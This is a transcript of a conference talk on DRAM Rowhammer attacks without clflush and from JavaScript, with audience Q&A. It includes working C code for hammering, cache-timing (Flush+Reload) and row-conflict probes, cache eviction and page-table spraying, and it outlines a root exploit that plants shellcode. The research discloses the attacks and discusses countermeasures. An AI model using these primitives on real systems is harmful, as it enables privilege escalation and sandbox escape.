and together with Daniel Gruss we're going to present to you our work of the past year on cache attacks and Rowhammer. So, a few words about ourselves. I just finished my PhD a couple of months ago, and I'm from Rennes in France. I'm from Germany originally, but I have lived in Austria for several years, and I started my PhD one year ago. I worked on cache attacks this year, and also on Rowhammer, when I found that all my laptops were very vulnerable to Rowhammering.

A few words about the timeline. This is a story about bit flips in DRAM. It all started basically last year with the paper by Kim et al., called "Flipping Bits in Memory Without Accessing Them", at the ISCA conference. That is the original Rowhammer attack with the clflush instruction; more on that instruction later. It was originally viewed as a reliability issue, and the security community started to say that being able to flip bits without accessing them might not be such a good idea from a security perspective. But some people were like: it's just a few bit flips, and we can't really control them, so what could possibly go wrong? Well, actually, a lot can go wrong, as shown by Mark Seaborn and Halvar Flake, who built not one but two exploits using Rowhammer with clflush: a sandbox escape and a root exploit. Shortly after that, Daniel started working on Rowhammer without clflush, and I joined him in Graz to work on it. We got our first bit flips without clflush on Ivy Bridge, and on Haswell a few days later. So this is a story about Rowhammer with clflush and without clflush. The bit flips without clflush are actually the building block of our first bit flips from JavaScript, which we got a few weeks later.

Okay, so you may know what this is: this is a DRAM module, a DIMM. Let's see how it is organized internally. For example, if you have two DIMMs, you can have two channels. A DIMM is composed of a back side and a front side, which are called ranks, and on these ranks you have eight chips. Inside these chips you have again eight banks, which are composed of rows and a row buffer. This is a logical view; we are not really interested in how it's actually implemented. We have our data, the bits, in the cells of these rows, and we can only access it row by row. When you want to access some data, the DRAM will issue an activate command on the row, which copies the data into the row buffer. Due to how DRAM is designed, the cells leak charge, so we have to refresh them, putting the charge back, so that we don't lose data. And these cells actually leak faster upon accesses to nearby rows, which leads to the Rowhammer bug. There is an analogy from Motherboard which I really like: Rowhammer is like breaking into an apartment by repeatedly slamming a neighbor's door until the vibrations open the door you were after.

So let's see how it works in the DRAM. You issue an activate command on a specific row, which copies it into the row buffer, and you want to issue a lot of activate commands on this row as fast as possible. The issue is that if you just access this row again, you will just read from the row buffer, which acts like a cache. So you need to activate another row, then this row again, then the other row, and then you have your bit flips. This is really bad, because we didn't touch the victim row at all, and its bits changed anyway. Now, the thing is, we can't just access data in DRAM like that, because between the CPU core and the DRAM, you have the CPU cache.
So if you just access the data over and over again, it will reach not the DRAM but the cache, and you won't get the bit flip. You need uncached accesses to reach the DRAM, and all the original attacks use the clflush instruction for that. This instruction flushes a line from the cache, so that the next access will be served from the DRAM.

Now, a bit of background on the cache, because it's really important for the remainder of the talk. In modern processors we have several cores, let's say four cores, and we have a real hierarchy of cache levels, here three levels. Level one and level two are private to each core, which means that core zero can only access its own level one and level two, but not the level one and level two of core three. Then we have the last-level cache, which is divided into so-called slices. These slices are shared across cores, so core zero can access slice zero, but also slices one, two, and three. Something else that is important is that this cache is inclusive, which means that all the data that is in level one and level two is also contained in the last-level cache.

Okay, let's now look at the Rowhammer attack with the clflush instruction. In addition to the DRAM bank that we already had before, we now have two cache sets, and there is a fixed mapping between DRAM cells and physical addresses, and thereby cache sets. So, if we already have the data in the cache, we first have to call the clflush instruction to throw it out of the cache; then it's gone; then we reload it, then we reload the other address, then we flush again, then reload, then flush, then reload, then flush, then reload, then flush, then... bit flip. Great.

Okay, before I continue with Rowhammer, I want to talk about just one more attack. I mentioned flush and reload a few seconds ago, right? Flush+Reload is a very powerful, very accurate cache attack, and you can do a lot of things with it. It works exactly like what we just did, but instead of just hammering all the time, we measure whether an access was served from the cache, so it is a cache hit, or whether it was a cache miss and was served from DRAM, and these take different amounts of time. If you do this on a shared library, you can spy on other processes, because a shared library might have a method that handles user input, and you can see when the code from this shared library is loaded into the cache. You didn't load it into the cache, so someone else did: that was user input. You can furthermore automate these attacks: when you can simulate the event that you want to spy on, you can automate the attack fully and auto-generate attacks on cryptographic algorithms, auto-generate keyloggers, or partial keyloggers, and you can even perform cross-VM attacks if the VMs share memory. It's not a good idea to share memory.

Okay. So, what we would like to do is this Rowhammer attack, but without the clflush instruction. The idea is to avoid clflush because it's platform-dependent: it's a specific x86 instruction, you won't have it on other architectures, and it's also not available from JavaScript. So doing this without clflush would really extend the world of possibilities.
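Before going on, here is a minimal native-code sketch (C with x86 intrinsics) of the two clflush-based primitives just described: a timed access, which is the measurement Flush+Reload relies on, and the classic flush-and-reload hammering loop. The addresses addr1 and addr2 are placeholders for two addresses the attacker already knows map to different rows of the same bank; how to find such addresses is one of the challenges discussed in a moment.

```c
#include <stdint.h>
#include <x86intrin.h>   /* _mm_clflush, _mm_mfence, __rdtscp */

/* Time one memory access in cycles. A cache hit is much faster than a
 * DRAM access; the hit/miss threshold must be calibrated per machine. */
static uint64_t timed_access(volatile uint8_t *p)
{
    unsigned int aux;
    _mm_mfence();
    uint64_t start = __rdtscp(&aux);
    (void)*p;                          /* the probed access */
    uint64_t end = __rdtscp(&aux);
    _mm_mfence();
    return end - start;
}

/* Classic Rowhammer loop: reload both addresses, then flush them, so
 * every iteration triggers two row activations in the same DRAM bank. */
void hammer(volatile uint8_t *addr1, volatile uint8_t *addr2,
            unsigned long rounds)
{
    while (rounds--) {
        (void)*addr1;
        (void)*addr2;
        _mm_clflush((const void *)addr1);
        _mm_clflush((const void *)addr2);
    }
}
```

Comparing timed_access() against a calibrated threshold is all Flush+Reload needs to decide whether someone else loaded a shared line in the meantime.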
So our approach is to use regular memory accesses to evict the cache, and the nice thing about this is that evicting the cache is really at the core of all cache attacks; this is what we know how to do best, so let's use it. It works kind of the same. We still have this gray line that we want to evict, and now we are going to access lots of addresses that map to the same cache set, until eventually the line we want is evicted. Something important here is that while we can choose into which cache set the accesses go, we cannot choose where inside the cache set they go; that depends on the replacement policy, so we just wait until we have evicted our line. Then the next access will be served from the DRAM, which is exactly what we wanted. And then we have to do that over and over again, until we have our bit flip without the clflush instruction.

Now, it looks nice and easy like this, but there are actually some challenges. First, how do we get physical addresses in JavaScript? It's a sandbox. Second, which physical addresses do we need to access, and in which order do we need to access them? And finally, how do we get accurate timings in JavaScript? So clearly, these are not trivial tasks.

Okay, let's talk about the first problem: physical addresses and DRAM. There is a fixed mapping from physical addresses to DRAM cells, but unfortunately it's not documented by Intel, for several reasons. Mark Seaborn reverse-engineered the mapping function for Sandy Bridge earlier this year, and we continued this reverse engineering just recently for Sandy Bridge, Ivy Bridge, Haswell, and Skylake, in different configurations. As you might have noticed, the row buffer serves as a cache: accessing something that is served from the current row buffer takes a different time than accessing another row, and if you have a row conflict, it takes much more time. You can exploit this to build another attack (there is a sketch of this measurement below).

But let's stay with the physical addresses for now. We now know the mapping from physical addresses to DRAM cells, but we don't know the mapping from JavaScript indices to physical addresses, right? Well, the operating system always wants to optimize everything, and one optimization is to use two-megabyte pages. Two-megabyte pages are more efficient because each TLB entry then covers more memory, so you can translate more virtual addresses with the same number of TLB entries. And if you use two-megabyte pages, the last 21 bits, so that's two megabytes, of the physical address and the virtual address are identical. Now the malloc implementations say, okay, it's a good idea to allocate large chunks of memory, and the operating system says, okay, it's a good idea to use two-megabyte pages there, and then we have the last 21 bits of the physical address in JavaScript. Furthermore, what we get from this is that we have several DRAM rows per two-megabyte page, so we know several rows that we can now hammer, and we have several congruent addresses in the cache, that is, addresses that map to the same cache set, so we can also perform eviction here. And if we do not have enough congruent addresses, we can still use timing attacks for cross-page information, and connect these two-megabyte pages that way.
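That cross-page connection uses exactly the row-conflict effect mentioned above. As a hedged sketch, reusing the clflush and rdtscp primitives from the earlier sketch: if two addresses lie in different rows of the same bank, alternating uncached accesses keep kicking each other out of the row buffer, so their average access time is measurably higher than for a pair in different banks. ROUNDS and the decision threshold are assumptions you would tune per machine.

```c
#include <stdint.h>
#include <x86intrin.h>

#define ROUNDS 10000   /* assumed value; more rounds average out the noise */

/* Average latency of accessing a and b back to back from DRAM.
 * A high average means a row conflict: same bank, different rows. */
static uint64_t pair_latency(volatile uint8_t *a, volatile uint8_t *b)
{
    uint64_t total = 0;
    for (int i = 0; i < ROUNDS; i++) {
        _mm_clflush((const void *)a);   /* force the next reads to DRAM */
        _mm_clflush((const void *)b);
        _mm_mfence();
        unsigned int aux;
        uint64_t t0 = __rdtscp(&aux);
        (void)*a;
        (void)*b;
        total += __rdtscp(&aux) - t0;
        _mm_mfence();
    }
    return total / ROUNDS;
}
```

Measuring pair_latency() between an unknown address and a reference address of known position tells you whether the two share a bank, which is enough to group addresses across two-megabyte pages.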
You can also use timing attacks to work completely without two-megabyte pages, with four-kilobyte pages instead, but that takes a lot more time.

So, the next question: which physical addresses do we need to access? This is what we call LRU eviction, because it assumes that the cache uses an LRU replacement policy, and it is exactly what I showed you before: we access n addresses from the same cache set to evict an n-way set. This is well known in the field of cache attacks, where it is called Prime+Probe, and it's documented in these articles if you want to read more. Now, we have this property of the last-level cache being inclusive, and what it means is that if we evict a line from the last-level cache, it will be evicted from the whole hierarchy, just to guarantee this inclusion property. So we only need to evict the line from the last-level cache. That sounds easy, right? Actually, not so much, again. We need to know very precisely where the addresses are mapped in the cache, and for the last-level cache we first need to know into which slice an address is going to be mapped. There is, in Intel processors, a hash function that maps physical addresses to slices, and it's undocumented by Intel. Fortunately, just before arriving in Graz, what I was tackling was reverse engineering this function, and I actually succeeded, and I was actually not alone: there were other teams working on it. So if you want the gory details on how we did this and what we achieved, you can look at these papers. Fun fact: this hash function is basically an XOR of address bits, and yes, they call it a hash function.

Okay. For the replacement policy: we just heard that an LRU replacement policy replaces the oldest entry first, so there is some kind of timestamp for every cache line. Now, when we access an address, it is either loaded into the cache, or it is already there and its timestamp is updated. If we do this n times for an n-way cache set, then we have certainly evicted the targeted address, because our n addresses are now in the cache. On more recent CPUs, that is not true anymore: they don't have an LRU replacement policy, and that is not good, because if you try LRU eviction on such a CPU, it might look like this. It does something, but we only have a 75% success rate on Haswell with LRU eviction. Of course, we can perform more accesses, more than the size of the cache set; the success rate will be higher, so it would work for cache attacks, but it would be too slow for Rowhammer. Instead, we have to think about how to trick the cache into evicting the targeted address earlier, so, tricking the cache into falling back to LRU behavior. One strategy to do that is this pattern: first we access address one, then address two, then address one again, then two again; then two and three, then two and three again; and so on. Using this access pattern, we have fast and effective eviction on Haswell CPUs, and also on Ivy Bridge, and it also works similarly on Skylake.
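Here is a sketch of that access pattern. WINDOW and REPEAT are illustrative parameters only (the values we actually used were tuned per microarchitecture), and `set` is assumed to hold congruent addresses, that is, addresses mapping to the same last-level cache set and slice. With WINDOW = 2 and REPEAT = 2 this reproduces exactly the "one, two, one, two, then two, three, two, three" sequence just described.

```c
#include <stdint.h>

#define WINDOW 2   /* addresses accessed together (assumed value) */
#define REPEAT 2   /* times each window is replayed (assumed value) */

/* Slide a small window over the congruent addresses and replay each
 * window a few times; the repeated accesses trick the non-LRU
 * replacement policy into evicting the target line early. */
static void evict(volatile uint8_t **set, int n)
{
    for (int s = 0; s + WINDOW <= n; s++)      /* slide the window */
        for (int r = 0; r < REPEAT; r++)       /* replay it */
            for (int i = 0; i < WINDOW; i++)
                (void)*set[s + i];
}
```

The same loop structure works from JavaScript with array indices instead of pointers, which is what makes this eviction approach portable.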
And with this eviction strategy, we can achieve an eviction rate of more than 99.97%, and this is enough for Rowhammer.

So, there is one remaining question: how do we get accurate timing in JavaScript? We need accurate timing for two purposes. First, to connect the cross-page information, if we do not have enough congruent addresses on a single page. Second, we have to decide whether an address is cached at some point, that is, whether eviction was successful or not. In native code, this is fairly easy, because you can just use rdtsc and get a sub-nanosecond-accurate timestamp. In JavaScript, it's a bit more complicated, but window.performance.now() is just fine; it works if you perform enough accesses. Now, there was a recent patch to prevent cache attacks in JavaScript. You should also check out this paper, it's really cool: they can track mouse movements and things like that in JavaScript. This was patched by rounding the time to five microseconds, and that helps against some cache attacks, but it does not help against Rowhammer, because we perform millions of accesses, and those consume much more than five microseconds.

We evaluated the bit flip rate on our Haswell test machine, and for this evaluation we varied the refresh interval in the BIOS. The default is very low, and the 75-something is the maximum refresh interval we could set. What you can see is that there is some point where the bit flips start to occur, and for clflush and for native code eviction, it's approximately the same; we get slightly fewer bit flips in the clflush variant. The JavaScript variant needs a somewhat higher refresh interval, because JavaScript is apparently a bit slower than our optimized native code. This is the number of bit flips within 15 minutes: you can see that with eviction or clflush, and even at the higher refresh intervals with JavaScript, we get more than 10,000 bit flips; that's more than 10 bit flips per second. Depending on your machine, it will work that well or it will not; that's totally up to the hardware in your system.
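For numbers like these, bit flips are found by scanning memory for unexpected changes. A minimal sketch of such a check, assuming the hammer() loop from the earlier sketch (or its eviction-based replacement), a machine-dependent ROW_SIZE, and victim/aggressor addresses that have already been located in adjacent rows of one bank:

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <x86intrin.h>

#define ROW_SIZE 8192   /* bytes per row here; machine-dependent assumption */

/* The flush-and-reload hammering loop from the earlier sketch. */
void hammer(volatile uint8_t *a, volatile uint8_t *b, unsigned long rounds);

static int count_flips(volatile uint8_t *victim,
                       volatile uint8_t *above, volatile uint8_t *below)
{
    memset((void *)victim, 0xFF, ROW_SIZE);         /* known pattern: all ones */
    for (size_t i = 0; i < ROW_SIZE; i += 64)
        _mm_clflush((const void *)(victim + i));    /* push pattern to DRAM */

    hammer(above, below, 2000000);                  /* hammer both neighbors */

    for (size_t i = 0; i < ROW_SIZE; i += 64)
        _mm_clflush((const void *)(victim + i));    /* re-read from DRAM */
    int flips = 0;
    for (size_t i = 0; i < ROW_SIZE; i++)
        if (victim[i] != 0xFF) {                    /* a bit leaked to zero */
            printf("flip at offset %zu: %02x\n", i, (unsigned)victim[i]);
            flips++;
        }
    return flips;
}
```

In a real run you would repeat this with the inverse pattern (all zeros) as well, since cells can flip in either direction depending on how they encode charge.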
So, let's now talk about exploits. How can we build exploits from these bit flips? The first idea we had was to port the root exploit by Mark Seaborn to JavaScript, and actually, this might work. We haven't finished this work yet, but it might work. The exploit by Mark Seaborn works by doing page table spraying: you fill the whole memory with page tables, and if you have a bit flip in a page table, that's bad, because you can gain access to one of your own page tables that way. This exploit needs shared memory, because you map the same page over and over again, so you don't need any physical memory for your data pages, only for the page tables. And we don't have shared memory in JavaScript. But fortunately, we observed earlier this year, when working on another paper, that zero pages are usually deduplicated. This means we do have some kind of shared memory, because all zero pages map to the same physical page. So we have some kind of shared memory in JavaScript after all. That's bad.

Okay: physical memory access in native code. If we want to build the exploit, we just follow a few steps. The first is to find an exploitable bit flip, so a bit flip that is in the right position, probably in an address bit. Then we release the page where we have the bit flip. Then we try to put a page table there by doing the page table spraying, allocating a lot of shared pages (a sketch of this spraying step follows below). Then we try to trigger the bit flip again, and we check whether it was successful, whether we now have a page table mapped instead of the shared page. And then we can try to modify the page table and see where in our address space something changes.

Now, if we want to do the same exploit in JavaScript, we would use zero pages, and zero pages are read-only. So we have to change only two pieces in the attack. The first is that we also have to flip the writable bit, and that's much harder, because the writable bit is in one specific position, and we only have one writable bit and not many address bits. The other thing we change is, yeah, we use zero pages instead of the shared pages. I tried this on my machines, and it is possible to find such bit flips, but they are of course much rarer than regular, single bit flips.

Okay, code execution as root. If we want to get that from our full physical memory access, that's again rather easy, because we can just search for a known binary page, modify the page, and add some shell code. This page will probably not be thrown out of memory, because we have a large file cache in our operating systems. Then we can just wait until the root user executes the shell code, and we can do anything on the system.
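As an illustration of the spraying step referenced above, here is a heavily simplified sketch following the idea of Mark Seaborn's published native exploit, not our exact code: map one shared file page into every 2 MB region of a large virtual address range, so the kernel has to allocate a fresh 4 KB last-level page table per region, while only a single physical data page is consumed. The file path, base address, mapping count, and the MAP_FIXED_NOREPLACE flag (which requires a recent Linux kernel) are all assumptions made for the sketch.

```c
#define _GNU_SOURCE            /* for MAP_FIXED_NOREPLACE */
#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>

int main(void)
{
    int fd = open("/tmp/spray", O_RDWR | O_CREAT, 0600);  /* hypothetical file */
    if (fd < 0 || ftruncate(fd, 4096) != 0)
        return 1;

    uintptr_t base = 0x100000000000ULL;   /* arbitrary unused address range */
    for (uintptr_t i = 0; i < 100000; i++) {
        /* One mapping per 2 MB region: each needs its own page table. */
        void *hint = (void *)(base + (i << 21));
        void *m = mmap(hint, 4096, PROT_READ | PROT_WRITE,
                       MAP_SHARED | MAP_FIXED_NOREPLACE, fd, 0);
        if (m == MAP_FAILED)
            break;
        *(volatile char *)m = 1;  /* touch it so the page table is allocated */
    }
    return 0;
}
```

Almost all of the physical memory consumed this way holds page tables, which is what makes a random bit flip likely to land in one of them.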
Okay, now we have a nice attack; we have to find countermeasures against it. The first thing that comes to mind is that we should avoid the bit flips right at the start: it's a hardware issue, so we should patch it in hardware, and the vendors are actually currently doing this. One solution is some sort of dynamic row refreshing: the idea is to refresh rows before bit flips can occur, a smart way of refreshing the rows. The issue is that this can only ship in new hardware; you cannot patch your existing hardware right now. So we have a huge legacy hardware problem, because the Rowhammer bug basically affects all DRAM vendors, it's really widespread, and this hardware will stay around for years.

The second idea is to patch the BIOS, and this has already shipped too. Here the idea is simpler, a sort of dumb way of doing it: we just increase the refresh rate, refreshing all rows more often, usually by doubling the refresh rate. The first issue is that this might not be sufficient for all machines, as was suggested by the original paper. The second issue is a bit more pressing: you need a BIOS update, and, like, who does that? Seriously.

Okay, we had another idea, because we wanted to find something against the problem. While we were hammering all the time and had no exploitable bit flip, we thought: okay, life is not perfect, that's okay. What if we just say we don't care about self-destructive processes that have bit flips in their own memory? We only have to prevent bit flips in memory that has a different privilege level, or in memory of other processes. If we can prevent that, then we can prevent any Rowhammer exploit. Let's say Rowhammering is okay, as long as you cannot exploit it. So the idea is to have sort of physical memory pools: in physical memory, you separate pages that have different privileges, and you leave gaps in physical memory that prevent bit flips from crossing between differently privileged memory regions. Now, that sounds a bit awful, but if you think about it, it could work: you group memory by privilege, and you only have to leave a small gap between these memory pools.

For the conclusions: cache eviction is fast enough to replace clflush, we have seen that. And without clflush, our attack is independent of the programming language and the available instructions, so we could even perform it on ARM smartphones or something like that. It's the first hardware-fault attack in JavaScript, and it's also the first hardware-fault attack performed through a remote website. Performing this attack through a website is actually a bit frightening, because even if, say, only 1% of systems are affected by Rowhammer, if I run a website and run this on 1 million users, that is still an awful lot of affected people, right? So we are not there yet, but look out for the Rowhammer.js JavaScript framework. Thank you.

Thank you very much. We have about five minutes left for questions, and the first two questions are from the Internet.

Hi, Daniel. So pretty much all of IRC wants to know: what about ECC RAM? How is ECC RAM vulnerable?

Yeah, that's a great question, thank you for asking it. ECC RAM basically works like this: you have these eight chips, and you have a ninth chip there, and this ninth chip also has rows. If you access a row here, it also has to fetch the checksum from the corresponding row there. So you access this row, and you access that row for the checksum, right? So you hammer on both sides at the same time. What happens then is unclear. There is ECC RAM that is more resistant to Rowhammering, but there is apparently also ECC RAM that is less stable against Rowhammering, and that's disturbing, right?

And the second question from the Internet: Frankie wants to know, does it work the other way around? Like Node.js running on the server, and attacking the server through inputs in the web page?

I didn't get that. So, Node.js... Yeah, what would you do with Node.js? Exploit the server. Yeah, probably that would work: if you can execute JavaScript code on the server, you could do the same on the server side, yes.

Okay, the gentleman at microphone one.

Hello. So the ECC RAM question would have been my first question, so good. I have a second one: is a short enough refresh rate going to always prevent Rowhammer, or is this not enough as a fix?

On my laptop, the one I have here, I observed one bit flip where I had to perform only 65,000 of these double hammering accesses. 65,000 accesses to DRAM take only a very short amount of time, so I don't think you can solve this completely with the refresh rate, but for most laptops and desktop PCs, it will be sufficient.

So, your answer was about the range you can manipulate in the BIOS. My question was not about the range of existing BIOSes; the question was whether we will always be able to produce a BIOS with a timing that is short enough to prevent Rowhammer.

You cannot configure it in all BIOSes, but if you can configure it, you can certainly set it low enough that you are resistant against Rowhammer.

Okay, next question, microphone two, and after that microphone number three.

You just mentioned mobile devices. Have you actually tried it, and how much are mobile devices affected?

Yes, we tried it, and we even put a smartphone in the refrigerator for that, because that apparently changes the refresh interval. But to get the bit flips, you have to hammer the two rows, right?
And right now, we have not yet reverse-engineered the DRAM mapping for the LPDDR3 in my smartphone, so we still have to do that.

If I understood correctly, the hammering is more effective at flipping bits the faster it occurs. So did asm.js support in browsers make the attack more effective?

To my knowledge, asm.js does not give you access to native code. It just provides you with efficient ways to implement something in JavaScript, and you can basically do this by hand. There are tricks like XORing zero to something, so that it becomes a more efficient statement in the optimized code that is executed on the CPU, and we did something like that to run our attack in JavaScript. But it's really simple to achieve this; you don't have to perform a lot of optimizations there, because it's pointer dereferencing. What can you do wrong with that?

Okay, thank you. Time is up. Thanks for the excellent timekeeping.